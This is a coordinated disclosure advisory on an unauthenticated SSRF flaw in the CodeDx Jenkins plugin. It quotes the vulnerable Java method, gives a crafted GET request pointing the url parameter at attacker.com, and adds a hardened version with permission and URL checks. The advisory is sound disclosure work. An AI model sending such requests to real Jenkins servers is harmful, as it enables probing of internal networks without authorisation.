Coordinated Disclosure Timeline

Summary

Several Server-Side Request Forgery (SSRF) vulnerabilities were found in the codedx-plugin. The vulnerabilities reside in the org.jenkinsci.plugins.codedx.CodeDxClient#doFillProjectIdItems, doCheckSelfSignedCertificateFingerprint and doCheckUrl methods and can be exploited without authentication. An attacker can leverage these vulnerabilities to send requests to arbitrary hosts.

Product

Codedx Jenkins plugin

Tested Version

v2.4.4-RC1

Details

SSRF in org.jenkinsci.plugins.codedx.CodeDxPublisher (GHSL-2023-072)

The doFillProjectIdItems, doCheckSelfSignedCertificateFingerprint and doCheckUrl methods in the CodeDxClient.java file lack proper validation and sanitization of user input for the url parameter, allowing blind exploitation of a server-side request forgery (SSRF).

Affected source code: CodeDxClient.java

public ListBoxModel doFillProjectIdItems(@QueryParameter final String url, @QueryParameter final String selfSignedCertificateFingerprint, @QueryParameter final String key, @AncestorInPath AbstractProject project) {
    ListBoxModel listBox = new ListBoxModel();
    CodeDxClient client = buildClient(url, key, selfSignedCertificateFingerprint);
    try {
        final List<Project> projects = client.getProjects();
        ...
    }
    ...
}

In order to exploit the vulnerability, an attacker may send the following crafted request:

GET /jenkins/descriptorByName/org.jenkinsci.plugins.codedx.CodeDxPublisher/fillProjectIdItems?url=http%3A%2F%2Fattacker.com&key=FLAG&selfSignedCertificateFingerprint=asdf HTTP/1.1
Host: localhost:8080
Connection: close

This vulnerability was found using CodeQL’s SSRF Java query.
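The root cause above is a form-validation endpoint that performs an outbound request with no check on who is calling it or where the request goes. As an added illustration (not the plugin's actual fix), the same lookup method with the two gates Jenkins form-validation methods are expected to have: a permission check that also covers the descriptorByName route (where no job is in the request path, so project is null), and a URL check before any client is built. The class name, fetchProjects and checkCallerMayConfigure are assumed helper names introduced here.

```java
import hudson.model.AbstractProject;
import hudson.model.Item;
import hudson.util.FormValidation;
import hudson.util.ListBoxModel;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;
import java.net.InetAddress;
import java.net.URI;

public abstract class HardenedCodeDxDescriptor {
    // The part that still builds a CodeDxClient and calls getProjects(); left abstract here (assumed helper).
    protected abstract ListBoxModel fetchProjects(String url, String key, String fingerprint);

    // Gate 1: who may trigger an outbound request. Via descriptorByName there is no job in the
    // request path, so project is null and Jenkins.ADMINISTER is required instead of job CONFIGURE.
    static void checkCallerMayConfigure(AbstractProject project) {
        if (project == null) Jenkins.get().checkPermission(Jenkins.ADMINISTER); // throws AccessDeniedException
        else project.checkPermission(Item.CONFIGURE);
    }

    // Gate 2: what the request may target. Absolute http(s) only, and the host must not
    // resolve to a loopback, link-local, site-local (RFC 1918) or wildcard address.
    public static FormValidation validateUrl(String url) {
        try {
            URI u = new URI(url);
            String scheme = u.getScheme();
            if (scheme == null || !(scheme.equals("http") || scheme.equals("https")) || u.getHost() == null) {
                return FormValidation.error("URL must be an absolute http or https URL");
            }
            InetAddress a = InetAddress.getByName(u.getHost());
            if (a.isLoopbackAddress() || a.isLinkLocalAddress() || a.isSiteLocalAddress() || a.isAnyLocalAddress()) {
                return FormValidation.error("URL must not point at an internal address");
            }
            return FormValidation.ok();
        } catch (Exception e) {
            return FormValidation.error("Invalid URL: " + e.getMessage());
        }
    }

    @POST // a lookup that causes outbound traffic should not be reachable by a plain GET
    public ListBoxModel doFillProjectIdItems(@QueryParameter final String url,
            @QueryParameter final String selfSignedCertificateFingerprint,
            @QueryParameter final String key, @AncestorInPath AbstractProject project) {
        checkCallerMayConfigure(project);
        if (validateUrl(url).kind != FormValidation.Kind.OK) {
            return new ListBoxModel(); // rejected URL: no request is made at all
        }
        return fetchProjects(url, key, selfSignedCertificateFingerprint);
    }
}
```

The address check resolves the host once at validation time, so a client that later resolves the name again is still exposed to DNS rebinding; the permission gate is the check that actually removes the unauthenticated attack surface described above.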

Impact

The vulnerability allows attackers to send requests to arbitrary hosts/paths without authentication. Since the attacker is not able to read the response, the impact of this vulnerability is limited. However, an attacker should be able to leverage this vulnerability to scan the internal network.

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2023-072 in any communication regarding this issue.